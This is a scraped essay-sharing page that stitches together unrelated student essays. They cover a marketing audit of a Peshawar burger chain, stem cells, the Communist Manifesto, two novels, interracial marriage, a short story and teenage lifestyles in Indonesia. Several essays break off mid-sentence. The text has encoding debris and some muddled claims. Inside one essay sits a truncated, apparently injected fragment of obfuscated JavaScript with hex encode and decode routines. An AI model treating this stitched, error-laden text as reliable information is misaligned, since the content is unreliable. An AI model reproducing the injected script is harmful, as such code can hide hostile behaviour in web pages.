Employees Employees are the main tools of a company. A capable and efficient staff of an organization gets edge over its rival. The staff of an organization will work efficiently if they are motivated so the employees must be motivated in order to create and maintain quality of the organizations products or services. Suppliers Suppliers also affect the organization environment. A bad quality of supply can degrade the quality of product that the company is providing. A good contact with supplier is important in order to receive raw materials at time and at right cost with best quality. Shareholders Shareholders are the important stakeholders of large companies. These are the significant parties as they can have an effect on the organization in many ways. For example: the shareholders can sue the company on wrongful acts. The organization must take shareholders in account because such parties can push the public limited company to a private limited company like PTCL.   Media The organization must take media into account while auditing the environmental factors of the organization. Wrong steps or statements taken and spoken by the organization can put itself into a situation. Bad publicity can be spread by the media. Sometime the media comes handy for the organization by promoting its products etc.   Competitors Competitors have to be taking into account as this micro environmental factor can help the organization to make fruitful decisions. The organization must keep keen eye on its competitors and should notice its practices. An important info can be received by the competitors that will help the organization. Publics: Publics are usually any groups that keeps stake in the organizations operational activities and objective accomplishment capabilities. Internal Publics, General Publics , Media Publics, Financial Publics, Government Publics etc. are the some types of publics. These must also be monitored while conducting environmental audit. Different Auditing techniques    Every business wants to know where it stands in the market along with the position of its competitors. For this purpose, following are some of the tools that help businesses for this purpose:   1) SWOT Analysis: SWOT stands for Strengths, Weaknesses, Opportunities, and Threats. The SWOT analysis helps in knowing your strengths and weakness and also helps an organization figure out what its major threats are along with the areas where opportunities for success can be exploited.    2) Ansoffs Matrix: Ansoffs Matrix is used by for knowing the growth in the market. This matrix allows marketers to find ways for growing the business by existing and/or new products, in existing and/or new markets. This matrix helps companies decide what course of action should be taken given current performance of the company. It consists of four groups i.e. market penetration, product development, market development and diversification.   3) The Boston Consulting Group or BCG Matrix: BCG Matrix has two controlling aspect namely relative market share meaning relative to the competition and market growth. This matrix performs similarly to the Ansoff Matrix in that it lets the organization know the growth that is taking place within the market of a particular product.    4) Core Competencies: Core competencies are techniques that deliver value to the customer. It gives potential access to a extensive variety of markets. It should make an important contribution to the supposed customer benefits of the end product.    5) Gap analysis: Gap analysis helps the organization in knowing where they are now and where they want to be in the recent future with the help of deciding business strategies and tactics. There is a simple structure to be followed in Gap analysis:   The first step is to decide on which factors will Gap be judged on. For example, by market share, profit, sales and some other factor. The second step is to ask two questions; where are we now? And where do we want to be?    6) PEST analysis: The PEST analysis is used in the process of environmental scanning. It gives an overview of the different macro environmental factors that the company has to take into consideration. It is a helpful strategic tool for perceptive market growth or decline, potential, business position and direction for operations.  The Factors are:   Political factors Economical factors Social factors Technological factors 7) Value Chain Analysis: The value chain analysis is a technique used in knowing about the development of competitive advantages and the different activities, which help in creating value. The primary activities involved are inbound logistic, service, marketing and sales, operations etc and the support activities are technological development and human resource management.    P2: Apply organizational and environmental auditing techniques in a given situation. CHIEF BURGER Mission Statement: Chief will be a leading Pakistani owned fast food company that is committed to providing innovative products that are consumer and lifestyle focused. We will achieve this by meeting our customer expectations Chief Burger offers a wide and varied menu to customers specializing in quality burger chicken products. They now offer products that have appeal to all ages and tastes including the sizzling steak, Chicken cheese burger, special chief pizza and chicken chow Mein to name a few. SWOT PEST ANALYSIS OF CHIEF BURGER SWOT Analysi A SWOT analysis is a strategic planning tool used to evaluate the strengths, weakness, opportunities and threats involved in a project or in a business venture or in any situation of an organization requiring a decision in pursuit of an objective. It involves the monitoring of internal and external market environment to the organization. Strengths: Chief burgers has got strong corporate image and brand name because they are the pioneer of fast food in Peshawar Chief Burgers has got strong market share as compare to its competitors. It has got low prices for both high and middle class people Chief Burgers special cheese burger, chicken steak burger, are one of its strengths because no other restaurant in Peshawar provides these kinds of burger with such quality and low prices One of the strengths of Chief Burgers is its location because its located in the center of university road. It has equal distance from Hayatabad and sadder. Location of Chief Burgers is also a center of attraction due to Jawad Towers, City Towers. People come to shop and diner or lunch at near by in chief Chief Burgers has a competitive edge over others in prices because it has lower prices than its competitors which are KFC and Pizza Hut Chief Burgers has loyal and trust worthy customers Chief Burgers offers maximum number of food variety Chief Burgers has minimum advertising budget but still has largest market share Weaknesses: Chief Burgers is not providing home delivery It is not providing any packages for kids and students Chief Burgers is not paying any attention to its promotional mix There is no special services like Pizza Hut i.e. it serves the customers a pizza within 19 minutes failing which customers are offered a free pizza There is no female employee to serve females thats the reason why most females are unwilling to eat at chief There is no car parking area which discourages people who have their own transport There is no departments integration Chief Burgers isnt providing any kind of entertainment facilities for kids and teenagers Opportunities: Chief Burgers has the opportunity to open new outlets nation wide because of the finance available and brand name Chief Burgers can introduce home delivery system Chief Burgers can use media for its advertisements like giving ads at TV Channels Participation in exhibition and fun fairs by stalls at different schools, colleges and universities can increase the sales Better use of customer information by the use of databases and home deliveries Threats: The expansion of low cost super markets. Pizza hut and KFC are providing free home deliveries, providing the best service which is creating a good and strong quality image in the eyes of their customers. Increase of local restaurants providing great variety of local food, due to which chief is losing its new customers. Different union strikes affects the business of Chief Burgers Threats of different pressure groups and food inspectors Chief Burger PESTLE Factors PESTLE analysis is a useful strategic tool for understanding market growth or decline, business position, potential and direction for operations. The headings of PEST are a framework for reviewing a situation, and can in addition to SWOT be applied by companies to review strategic directions, including marketing proposition. The use of PESTLE analysis can be seen effective for business and strategic planning, marketing planning, business and product development and research reports. PESTLE also ensures that companys performance is aligned positively with the powerful forces of change that are affecting business environment PESTLE is useful when a company decides to enter its business operations into new markets and new countries. The use of PESTLE, in this case, helps to break free of unconscious assumptions, and help to effectively adapt to the realities of the new environment Political factor: Chief Burger is a member of chamber of commerce of Pakistan It has a valid license with patent protection The employee pay is not less than 5000 according to the ordinance of 2006 Being a member of chamber of commerce Chief Burger cant set prices below its productivity because of anti dumping legislations It repels monopoly market and creates a perfect market for its competition If competition comes in the market Chief Burger can not cover proper advertisement techniques as they lack in marketing department. In contrast the competitors (KFC, Pizza Hut) can cover it easily Chief Burger can easily cope with certain fluctuating political changes much better than other because its the member of chamber of commerce Economical factors: Chief Burger has an economical benefit of cheap labor Because of high inflation rate of consumer price index according to ( is 15.8% results in the expenses of raw material and other supplies Per capita income according to has decreased by 50% in the last two years. Therefore Chief Burger as a business is getting loss straight away through market sales Social factors: Chief Burger can not sell products which are banned in Islam like ham burgers and alcoholic drinks Due to the culture and traditions of Khyber Pakhtunkhwa, most people dont like to hang out with families in restaurants which affects Chief Burgers sales Chief Burger inevitably built separate portion for families due to social trend Most people are used to eating conventional food like (Charsi Tikaa, Jalil Kabab) etc therefore the sales of chief burger is affected somewhat. Technological factors: Chief Burger uses two kinds of databases for record keeping and interpretations of data 1.MS SQL database system for main office 2.interpretation and simple calculation machine for daily record keeping and calculations Technologically Chief Burger has improved its revenue through internet reservations on website in which information is given about the products portfolio Chief Burger uses the following cooking equipments effect of which is clear in the quality products it produces. 1-Hani Pani for pizza making 2-Electric Meat Grinder 3-Electric Cheese Smelter for pizza 4-Ice Machine Flakers 5-Electric Coffee Brewer 6-Electric Ovens 7-Electic Dish Washer Legal factors: It has a valid license with patent protection. They have valid license for fast food restaurant from local authorities. They have outstanding record in the book of food inspectors. Member of all frontier Hotel restaurant association. They have good coordination with local security organization, police etc for better security of citizens. They have valid work permit at the place Jawad plaza. They have proper contract with supplier, employees and other stakeholders. Environmental factors: The chief has very ethical way of business. They have neat and clean environment. Facilities of public hall as well as family hall according to the tradition of Khyber Pakhtunkhwa. They are on the sound place in terms of environment (University road university town). Very friendly environment as Khyber Pakhtunkhwa is known for hospitality. P3: Identify the main barriers to marketing planning BARRIER A barrier is an obstruction that prevents the coming-into-force of a exacting measure or causes holdup in its implementation. Barriers can be inflexible or flexible, the latter being able to be conquer given sufficient time or resources. Land use measures be likely to face more inflexible barriers than, say management or information measures. Types of barrier: Barriers can be moreover positive or negative. A positive barrier occurs when one of the objectives of the strategy limits the ability of a measure to accomplish other objectives. Environmental restraints are examples, and their burden could well improve the measure or its performance. By contrast, a negative barrier, such as insufficient legislation, may cause delays and surplus costs in the implementation of the measure. The negative barriers can be assembled into three categories: Legal and institutional: short of legal powers to put into practice a particular measure, and legal responsibilities which are crack between agencies, limiting the capability of the city authority to implement the exaggerated measure; Financial: budget restrictions warns the overall expenses on the strategy, financial restrictions on precise measures, and limitations on the elasticity with which revenues can be used to finance the full variety of measures; Political and cultural aspects: deficient of political or public acceptance of a measure, limits imposed by pressure groups, and cultural trait, such as attitudes to enforcement, which power the effectiveness of measures. Political barriers Governments from time to time place limitations on trade, preventing entry into the marketplace. Sometimes, governments make the trade in of certain goods unbeneficial by placing duties on the imports. Other times, governments do not let goods into the country at all. Duties are used by governments to defend developing industries that cannot yet compete with other industries abroad. Goods are banned for a variety of political causes. Occasionally the products are seen as harmful to the customers. Other political barriers are in retribution to barriers put by other countries. TECHNOLOGICAL BARRIERS Technology manipulates all aspects of a peoples life. Barriers in technology can be clear, like teachers who are deficient in funding and support, or people in countries with governments that inflict restriction by blocking complete asses to the Internet. Barriers can also be more revolutionary, like the commercialization of application and software which go beside the open-source collective strength that constrains technology to new heights. Financial barriers Standard of living often depends on the sum of money a person has to pay out and invest. Many ordinary activities that can get better ones standard of living, such as going to college, opening a business, buying a house, roving and buying a car, require a important amount of financial resources. When high expenses make a certain activity hard to afford, it is measured a financial barrier. Financial barriers can occur in many dissimilar contexts and have an effect on individuals, families and businesses. An individual can face a financial barrier any time, choose not to do something because of its cost. ECONOMIES OF SCALE The boost in  efficiency of production  as the numeral of goods  being produced raises.  Typically, a company that accomplishes economies of scale lowers the standard cost per unit through amplified production since fixed costs are shared over an increased number of merchandises.   Internal and External Economies of Scale Alfred Marshall made a difference between internal and external economies of scale. When a company decreases costs and increases production, internal economies of scale have been accomplished. External economies of scale arise outside of a firm, within an industry. Thus, when an industrys capacity of operations expands due to, for example, the formation of a better shipping network, resulting in a ensuing reduce in cost for a business working within that industry, external economies of scale are said to have been accomplished. With external ES, all firms within the industry will advantage. CUTURAL BARRIERS Cultures give people with customs of thinkingways of seeing, hearing and interpreting the world. Thus the similar words can mean dissimilar things to people from different cultures, even when they speak the same language. Stella Ting-Toomey describes 3 ways in which culture obstructs with effective cross-cultural understanding. Primary is what she named cognitive constraints. These are the edges of orientation or world analysis that gives a backdrop that all new information is evaluated to or inserted into. The 2nd one is behavior constraints. every culture has policies about appropriate manners which have an effect on spoken and nonverbal statement. Whether one seems the other individual in the eye-or not; whether one says what one means openly or talks around the matter; how close the people position to each other when they are talkingall of these and many more are regulations of politeness which vary from culture to culture. The third one is emotional constraints. Different cultures control the display of emotion in a different way. Some cultures get extremely arousing when they are discussing an issue.   They shout, they weep, they show their annoyance, fear, aggravation and other feelings explicitly. Other cultures attempt to remain their emotions concealed, exhibiting or sharing only the rational or truthful feature of the situation. SOCIAL BARRIERS Social barriers are simply layers that we have built around ourselves to protect us from the outside world, they are barriers we put up when meeting new people which protect us from being emotionally hurt when talking to others. Introverted people arent actually introverts at all, but rather extroverts who have many social barriers inside their head that stop them from saying certain things. COMMUNICATION BARRIERS An effective communication barrier is one of the troubles faced by many companies. Many social psychologists speak out that there is 50% to 70% loss of meaning while transforming the messages from a sender to a receiver. They approximate there are four basic places where communication could be understand wrongly. Little barriers of effective communication in an association are given below. Physical Barriers One of the main barriers of communication in a place of work is the physical barrier. Physical barriers in a company include large working areas that are physically alienated from others. Other interruptions that could cause a physical barrier in an association are the environment, background noise Language incapability to talk in a language that is known by both the sender and receiver is the utmost barrier to effective communication. When a person uses unsuitable words while conversing or writing, it could lead to confusion between the sender and a receiver. Emotions emotions might be a barrier to communication if you are absorbed in your emotions for several reasons. In such cases, you tend to have problem listening to others or accepting the message expressed to you. A small number of the emotional interferences include aggression, annoyance, resentfulness and terror. Lack of Subject Knowledge If an individual who sends a message shorts subject information then he may not be able to transmit his message obviously. The receiver could get the wrong idea of his message, and this could direct to a barrier to effective communication. Stress One of the key communication barriers faced by workers in most of the organization is stress. When an individual is under huge stress, he may find it hard to understand the message, foremost to communication deformation. At the point of stress, our psychological frame of mind depends on our viewpoints, experiences, objectives and principles. Thus, we fall short to understand the spirit of communication. P 4: Suggest how organizations may overcome barriers to marketing planning Planning is a logical sequence of events leading to the setting of marketing objectives and a formulation of plans for achieving them. The complexity of marketing planning means that when organizations embark on it, they should expect to encounter a number of organizational, attitudinal, process and cognitive problems. This essay is an attempt to outline some of those problems; however it is beyond this essay to clarify all possible barriers in implementing a marketing plan. CHIEF can overcome all these possible barriers to marketing planning by making objective, strategies, marketing plans and implementing those strategies. Manager need to instruct and demonstrate that how in cooperation they can achieve the strategies, shared the values of marketing, organizational structure should reflect customer groups and by undertaking effective process of marketing audit and techniques. M 1: Make an effective judgment  that how will the studied organization  audit the marketing environment The process of marketing audit is very broad and extensive in nature in a way that it includes almost all marketing related aspects. It basically includes marketing environment, marketing strategy, marketing organization, marketing systems, marketing mix, marketing productivity and profitability. CHIEF, a Pakistani owned fast food restaurant that is committed to providing high quality products to consumers and achieving this by customer expectations. The current position of CHEIF is good in Market also the CHEIF attract customers but have to do a lot. During our analysis and meeting with the manager (CHIEF), we come to know that CHIEF is not using any type of marketing audit techniques and they do not have any marketing specialized people and even they didnt studied their market right. They didnt undertake such common things like competitors strength, market share, opportunities, technological factors, threats economic factors etc. CHIEF is suffering a lot in the market because increasing of local restaurants providing great variety of local food, due to which chief is losing its new customers. CHIEF is not taking promotional aspect seriously for their products due to which they are loosing their customers because the lack of awareness. CHIEF main direct competitors are international fast food restaurants (Kfc, Pizza Hut) having a strong brand image and known for high quality products, providing pizzas in minimum time and locally direct competitors are Thames Burger, Masooms restaurant, Mr. Cod etc. The effects of direct customers are that these organizations are selling products that are similar in nature. There is a high level of competition in the market among those organizations in order to get more and more market share. The organization specializes in similar product line which forces the organization to produce more quality in the products and sell at low prices The indirect competitors of CHIEF are Shiraz Restaurants, Lasania, Usmania, Balana, Charsi Tikka Shop, Dawat, Namak Mandi Food Street etc The indirect competitors effect the competition. These businesses provide similar items that can satisfy the need of the customers  I-e appetite. So it extends the competition level even more as the organization starts struggle to grab more and more market share and increase its selling. CHIEF is heavily struggling in order to take market le

Thursday, September 19, 2019

Characteristics of Stem Cells :: essays research papers

Stem cells have two important characteristics that distinguish them from other types of cells. First, they are unspecialized cells that renew themselves for long periods through cell division. The second is that under certain physiologic or experimental conditions, they can be induced to become cells with special functions such as the beating cells of the heart muscle or the insulin-producing cells of the pancreas. Scientists primarily work with two kinds of stem cells from animals and humans: embryonic stem cells and adult stem cells, which have different functions and characteristics that will be explained in this document. Scientists discovered ways to obtain or derive stem cells from early mouse embryos more than 20 years ago. Many years of detailed study of the biology of mouse stem cells led to the discovery, in 1998, of how to isolate stem cells from human embryos and grow the cells in the laboratory. These are called human embryonic stem cells. The embryos used in these studies were created for infertility purposes through in vitro fertilization procedures and when they were no longer needed for that purpose, they were donated for research with the informed consent of the donor. Stem cells are important for living organisms for many reasons. In the 3- to 5-day-old embryo, called a blastocyst, stem cells in developing tissues give rise to the multiple specialized cell types that make up the heart, lung, skin, and other tissues. In some adult tissues, such as bone marrow, muscle, and brain, discrete populations of adult stem cells generate replacements for cells that are lost through normal wear and tear, injury, or disease. It has been hypothesized by scientists that stem cells may, at some point in the future, become the basis for treating diseases such as Parkinson's disease, diabetes, and heart disease. Scientists want to study stem cells in the laboratory so they can learn about their essential properties and what makes them different from specialized cell types. As scientists learn more about stem cells, it may become possible to use the cells not just in cell-based therapies, but also for screening new drugs and toxins and understanding birth defects.

Wednesday, September 18, 2019

The Manifesto of the Communist Party Essay -- Politics Political

The Manifesto of the Communist Party Drafted in 1848 by Karl Marx and Frederick Engels, the â€Å"Manifesto of the Communist Party† outlines the views, tendencies, and aims of the communist party through the so-called philosophy of historical materialism (Distante). These views were expressed throughout four distinct sections of the â€Å"Manifesto of the Communist Party.† The first section describes the relationship between the bourgeois and the proletarians. The next section depicts the relationship between the proletarians and the communists. The third section of the document presents socialist and communist literature. The â€Å"Manifesto†¦Ã¢â‚¬  is ended with a section stating the position of the communists in relation to opposition parties. The first section begins with a brief history of the bourgeois in various societies. Marx shows that like earlier civilizations, the bourgeois, or modern capitalists and employers, has oppressed the proletarian class, or the working class of the society. Comparisons are made regarding ancient Rome as well as the middle ages with the modern bourgeois. Marx claims that the â€Å"modern bourgeois society that has sprouted from the ruins of feudal society [†¦.] It has but established new classes, new conditions of oppression (Marx).† During the feudal period, the feudal lords monopolized industry. As time progressed, this system was insufficient for the growing needs of the nation. A new manufacturing system took the place of the monopoly system and soon provided for the natural evolution of the capitalist class. Due to increased work and efficiency, the markets continued to grow to the point that even the manufacturing system was not sufficient. Industrial revol... ...tionary movement against the existing social and political order of things. In all these movements they bring to the front, as the leading question in each, the property question†¦Working men of all countries unite! (Marx)† Works Cited 1. Brians, Paul. Communist Manifesto Study Questions. (19 Oct. 2001). 2. Distante, Patrick. Evolutionary Philosophy---the Late 19th Century. (19 Oct. 2001) 3. Kuhn, Rick. The Communist Manifesto. (19 Oct. 2001). 4. Marx, Karl and Engels, Freidrich. The Manifesto of the Communist Party. (New York: Monthly Review Press, 1964) 5. Marxism Made Simple. (19 Oct 2001).

A Womans Place in Fantasia and So Long a Letter Essay -- Fantasia So

A Woman's Place in Fantasia and So Long a Letter Throughout history women have always had to stand behind their men (whether it be rules, tradition, etc.). In almost every history context, whether it about wars or people, they have almost been written by men for men. It is not even until this century that women in this country have gained new grounds for the equality that we hope will be as substantial with men’s equality. Despite women’s hopes for equality, there is always old traditions that are so hard to be break that they sometimes keep women in inferior positions. In these two novels, Fantasia and So Long a Letter ,we will explore how the women in these novels deal with modernity and the ways in which it conflicts with some of the traditions of their society. In So Long a Letter, the main character of the novel, Ramatoulaye is coming to grips of the hardships placed upon her when her husband takes on a second wife. In Ramatoulaye’s case, we see her conflicting emotions for she considers herself a feminist modern woman, however she is still somewhat submissive to the ways of tradition. She ponders on the alternatives, yet she comes to one conclusion, to stay with her husband. Her marriage paralleled that of her good friend’s Aissatou, however Aissatou was able to forge ahead with a new life that did not involve polygamy. Armed with her education and her strong will, Aissatou did not let tradition or fear sustain her in a relationship that she deemed degrading. Aissatou is the embodiment of all the hopes that Ramatoulaye and Aissatou had when they were young, to become strong independent women who would hold their heads up high in times of hardship. Ramatoulaye is envious of her friend Aissatou who is able to cut ... ...y had to, for they needed to recruit the help of all Algerian to help them in their cause. However, as time passes these freedoms are revoked. The women are left veiled once again and domesticated to the indoor. We’re able to see that Cherifa’s freedom as a fighter has changed. As the Revolution has ended, she is no longer able to run around freely as a man. In old age â€Å"[Cherifa] is housebound, As she sets her voice free, she sets herself free again; what nostalgia will cause her voice to fail presently†. Through these two novels, we’re able to see the quandaries that women must face when modernity and old customs come head to head. Both of these women remain brave and to try to sustain their new found freedoms, despite any difficult encounters. It is these women with their fierce ideals that would make them pioneers for all women liberation movements.

Tuesday, September 17, 2019

Interracial Marriage Essay

Interracial marriage occurs between two people from separate racial backgrounds. As a general note â€Å"African Americans, Hispanics, and Asian Americans are far less numerous than whites, and therefore have fewer opportunities to meet one another. â€Å"Most interracial marriages, therefore, involve whites, who constitute the majority of the population† (Qian, 1999, p. 579). Throughout history interracial marriage has not been recognized in the United States as a valid marriage. â€Å"One theme that has been pervasive in U. S. history and literature and that has been accompanied by a 300-year-long tradition of legislation, jurisdiction, protest, and defiance is the deep concern about, and the attempt to prohibit, contain, or deny, the presence of black-white interracial sexual relations, interracial marriage, interracial descent, and other family relations across the powerful black-white divide† (Sollors, 2000, p. 3). Interracial couples have been scrutinized, judged, and looked down upon simply for loving someone with a different skin color. In the not so distant past â€Å"a complicated area defined only by the racial difference of bride and groom was designated where family founding was considered â€Å"null and void,† and children of interracially married couples were deemed illegitimate†(Sollors, 2000, p. 3). In recent years the interracial couple has been more accepted by society. Despite this acceptance there is a number of issues interracial marriages face. Reviewing the structure of the interracial marriage will help us gain an understanding of interracial marriage. â€Å"While, in 1970, 0. 7 percent of all marriages in the continental United States were interracial, today 2 percent of all Americans marry outside their race The number of ‘mixed-race’ births have grown 26 times faster than all U. S. births† (Korgen, 1998, p. 1). Interracial couples have a variety of backgrounds and there is not a conclusive theory that suggests why people enter into interracial relationships. The basic explanation for entering an interracial relationship is physical attraction and comfortableness. Research has found â€Å"Most biracial couples say that they became attracted to each other because of compatibility† (Socha & Diggs, 1999, p. 150). Interracial couples and families expand over all socioeconomic classes. Unfortunately, â€Å"most (interracial) couples have experienced some form of racism during their relationship†(McNamara, Tempenis & Walton, 1999, p. 106). With the exception of racism â€Å"There has been very little written on the interracial family, and nothing regarding the interracial family contextualized in leisure within the leisure literature. As the number of interracial marriages increases, it will become increasingly important to understand the needs of these families† (Hibbler & Shinew, 2002). Culture throughout interracial families is distinguished by each individual couple. â€Å"In general, one of the major issues for interracial families is identifying, preserving, and explaining the cultural heritage to their children†(McNamara, Tempenis & Walton, 1999, p. 65). Studies have found that typically one culture has a stronger influence on the interracial couple. The culture with the stronger influence typically takes over in the household and that culture is more influential with the children involved in the interracial family. â€Å"Our racial structure does not yet allow biracial Americans to choose freely between their two racial heritages† (Korgen, 1998, p. 67). Interracial children often have a hard time identifying with their background. â€Å"Typically, racially mixed children will be somewhat ambivalent towards their parents’ ethnic or racial backgrounds† (McNamara, Tempenis & Walton, 1999, p. 66). Biracial children have an especially difficult time identifying themselves as teenagers. â€Å"As the child enters high school, where one’s identity begins to take a particular shape dating begins, it is easy to see how difficulties can develop for biracial children. Since their physical appearance is different, and their families are considered unusual, many peer groups reject them† (McNamara, Tempenis & Walton, 1999, p. 66). A substantial historical literature base suggests that interracial marriage may have a number of negative effects on the couples and their children. Among the suggested negative effects are anxiety, insecurity, guilt, anger, depression, and identity conflicts. On the rare occasions that biracial people and/or interracial couples are asked about their social reality, they often report that the psychological and sociological problems that they face are manifestations of racism and overall societal pressure. This suggests that, perhaps the broader concern is not the issues affecting those involved in interracial relationships, but rather the societal issue of race and the â€Å"possessive investment in whiteness†(Hibbler & Shinew, 2002). Biracial children typically identify themselves with one race and portray those characteristics. â€Å"Biracial Americans who appear white are often judged by different standards than darker mixed-race individuals when they face the racial litmus test. Those who appear white are assumed to be white by those in the larger society who are unaware of their heritage† (Korgen, 1998, p. 64). The biggest issues interracial couples and children deal with are racism and self identity. There are several coping mechanisms for interracial families deal with when experiencing racism or self identity including ignoring it, dismiss it, and normalize it, awareness, hiding, support groups, and using humor to cope with negative reactions of others. Ignoring and dismissing racism are very similar concepts. People have said that sometimes they feel they should say something in return to a racist comment but choose to ignore or dismiss it to avoid conflict. Normalizing racism occurs when people accept that they will be singled out because they are an interracial couple. An interracially married woman â€Å"Sydney Mead has this to say (about interracial marriage and portrayed racism): We are just ordinary people, an ordinary married couple and go through the same things that everybody else goes through. We have our problems you know, up and down, up and down† (McNamara, Tempenis & Walton, 1999, p. 111). Awareness is when interracial â€Å"couples are able to minimize the likelihood of encountering problems, or diminishing their impact, by being very aware of their surroundings and the places they frequent. Many feel they can significantly reduce the type and frequency of problems by simply avoiding some places and spending more time at others† (McNamara, Tempenis & Walton, 1999, p. 111). Hiding is when couples withdrawal from social interaction to avoid racism or judgment. Support groups are an excellent resource for interracial couples who have estranged family and need to build a social network of support. Humor is another coping mechanism. Many couples have learned to laugh about the interactions they have as an interracial couple. Laughter and making jokes often helps to ease the pain of racism and make light of situations (McNamara, Tempenis & Walton, 1999). While it is true that interracial marriage has changed in the eyes of society in recent years, â€Å"†A great deal of misinformation exists concerning interracial couples. (McNamara, Tempenis & Walton, 1999, p. 3). â€Å"The recent increase in interracial marriage is seen as a positive change in race relations and a decline in racism. It also indicates that racial distances have declined between whites and racial minorities because of the increase in interracial marriages with whites for all racial minorities â€Å"(Qian, 1999, p. 579). The acceptance of interracial marriage and the decline in racism is a great achievement for society. This is true but â€Å"there are still powerful forces in society that make interracial marriage difficult, unappealing to people who might be looking for a partner, or otherwise unlikely† (Socha & Diggs, 1999, p. 150). Although there has been much progress and acceptance with the concept of interracial marriages in society there is much more work and progress that needs to be completed. More research needs to be conducted to fully understand the cultural influences interracial families have. â€Å"Overall, more attention is needed for ethnic culture, especially in the family communication classroom. This general inattention can be attributed, in part, to family communication scholars’ and educators’ viewing their work from a Eurocentric perspective, which, similar to Eurocentrism in everyday life, leads to a general neglect of ethnic culture by assuming that all families are similar to those of the dominant group (i. e. , European Americans) and/or minimizing those who are different from the dominant group† (Socha & Diggs, 1999, p.210). References Hibbler, D. K. , & Shinew, K. J. (2002). Interracial Couples’ Experience of Leisure: A Social Network Approach. Journal of Leisure Research, 34(2), 135+. Retrieved April 11, 2007, from Questia database: http://www. questia. com/PM. qst? a=o&d=5000783247 Korgen, K. O. (1998). From Black to Biracial: Transforming Racial Identity among Americans. Westport, CT: Praeger Publishers. Retrieved April 11, 2007, from Questia database: http://www. questia. com/PM. qst? a=o&d=9959531

Monday, September 16, 2019

Pool by corey campbell Essay

The â€Å"good life† is what the majority of humanity desired. Even though it seemingly rules as the main goal today, people have established a more modern point of view. More and more people have started to counter pregnancy in general and that is definitely new. â€Å"It all changes with a kid.†(l.168) Children bring a huge commitment into the lives of us all and that’s why there are so many that avoid the so called â€Å"good† life. This is the main theme of the short story Pool. The story centers on the comparison of Darla’s life and the typical life of marriage. Darla is a woman that’s assumingly in her mid-twenties/start-thirties. We don’t receive an exact number of her years, but this is what we ´d normally assume. This is the age, where most people decide to settle down with a spouse and have children. Darla is however not like most people. It’s as if, she doesn’t possess the anxiety of her biological clock running out, like most women do. This is a very important element to Darla’s character. Throughout the text she constantly hints that, she does not want a child. â€Å"I’d be horrible at it. I’d probably start drinking. I know I would.†(l.80) This is one of many times that she speaks her mind freely about the subject. Darla has paired herself up with Jon, and the story states that the two have been together just under a year. The interesting part is however, what Darla favors about their relationship: â€Å"What she liked best about him, Darla had just realized earlier in the car, was that it wasn’t going to last, so she really didn’t have to care that much really.†(l.11-13) The quotation from the story indicates that Darla is a more modern and casual human being. The reader is told early on that a conflict in their relationship has stirred up. Darla and Jon had sexual intercourse the night prior to the pool party, and their condom had split. It’s important for Darla not to become a mother, and it seems like it’s her highest priority to avoid things that might counter the effect, of the morning after pill she swallowed. Once in the story Jon offers her a sip of beer, but she immediately turns it down even though the pill was a guarantee 99 percent success. â€Å"She put her hand on his wrist†¦Ã¢â‚¬ Just stop,† she said. Her throat dried up,† (l.51, 53) Here we get a sense of Darla’s anxiety. An interesting detail surrounding the relationship between Darla and Jon is that we don’t hear that much about Jon’s opinion on being a parent. More than that, we don’t know how he feels about Darla and their relationship. We do get a little impression of his concern for Darla in the beginning of the text: †You OK?†(l.14) Here he questions Darla about her being okay, mentally in relation to the split condom. Other than that he pushes her to strap on her bathing suit multiple times, but that is a problem for Darla due to her insecurities. Darla responds negatively: â€Å"Darla Gave Jon a look and he shrugged. She thought of quicksand – if she were being dragged under, Jon would probably just stay there and give the same shrug. Whenever she got very sad, which happened sometimes, Jon acted as if leaving her alone was the best thing,† (l.138-141) This short lines give us a very good glimpse of Darla’s personal torment and their relationship. There are, however not that many things that tell us about Jon’s point of view to their relationship. He could have the same opinion as Darla, meaning that he is a casual guy; he knows their relationship won’t last and he isn’t at all looking to start a family in a suburban neighborhood where the story is set. We actually don’t know that much about Jon at all. It’s definitely worth noting that we get a more detailed description of Trevor than we do of Jon. This is especially interesting since the story is told from Darla’s point of view. It’s another great detail to their relationship, and it could indeed have ties to the story’s odd ending. As a full interpretation it’s safe to state the fact that Darla doesn’t want to grow up. The story is set in the typical suburban neighborhood; Houses put up like boxes, probably surrounded by white-picked fences, infested with needy children and this is what Darla is the opposition of. It’s as if she wants to stay young even though it’s an impossible mission and that could be why she acted up on Trevor in the ending. There aren’t many people in the world that have the will to grow old, but there are some hid in the lines of humans that have a definitive phobia. In conclusion: Darla’s hopes/dreams lie outside the category of hopes/dreams that are sided with the majority of the people in modern America. Darla’s category may be small in numbers at the moment, but it seems that the table is about to turn. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=†Ã¢â‚¬ ,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Sunday, September 15, 2019

Changes in Teenage Lifestyle: Indonesia

Lifestyle is a person's behavior indicated in the activities, interests and opinions especially those related to self-image to reflect the social status. Modern lifestyle synonymous with luxury. Lifestyle is also very closely related to the times and technology. Increasing age and increasingly sophisticated technology, the more widespread implementation of lifestyle also by humans in everyday life. In another sense, lifestyle can give positive or negative effects for those who run it. Well, depending on how the person living it. Today, the lifestyle is often misused by most teenagers. Moreover, teens who are in a Metropolitan city. They tend to follow fashion lifestyle today. Of course, fashion that they copied from the west. If they can filter out the good and proper, then the effects may also be positive. But otherwise, if not good at filtering out of the western mode, it will negatively affect their own. One example of the lifestyle of teenagers who follow Western fashion in everyday life is a matter of â€Å"dressed†. Problems clad teenagers of today are always associated with the times and technology. Because, in Indonesia, particularly teenagers, in clothes always obeying the prevailing fashion. Even more sadly, in many tv stations show examples of life style in the teens dressed people who follow western fashion. Metropolitan Auto not only teenagers who follow fashion, but also the people who are in villages or countryside. The next example, lifestyle most teens follow the western culture is taking a drink – booze, drugs, and the like. They assume that if it does not consume these goods, then he will be judged as a society that is out of date or not slang. Most of the youth of Indonesia has not been able to filter culture with properly. So, the negative effect arising from the teen's own self. We know that the mode adopted by most western people deviate from the moral. While we are aware that Indonesia is famous for luhurnya kesopanannya and kindness. However, some Indonesian teenager then mimic or follow the Western mode without the filter is good and right. And maybe it would be bad for our future generations. Therefore, in this modern era of the all parents who have teenage children should monitor the social, friends, and lifestyles which they apply. And for the teens should be cautious in accepting the culture from the outside and should be able to filter the culture from the outside in good and proper.

Saturday, September 14, 2019

Altering Stop and Frisk Essay

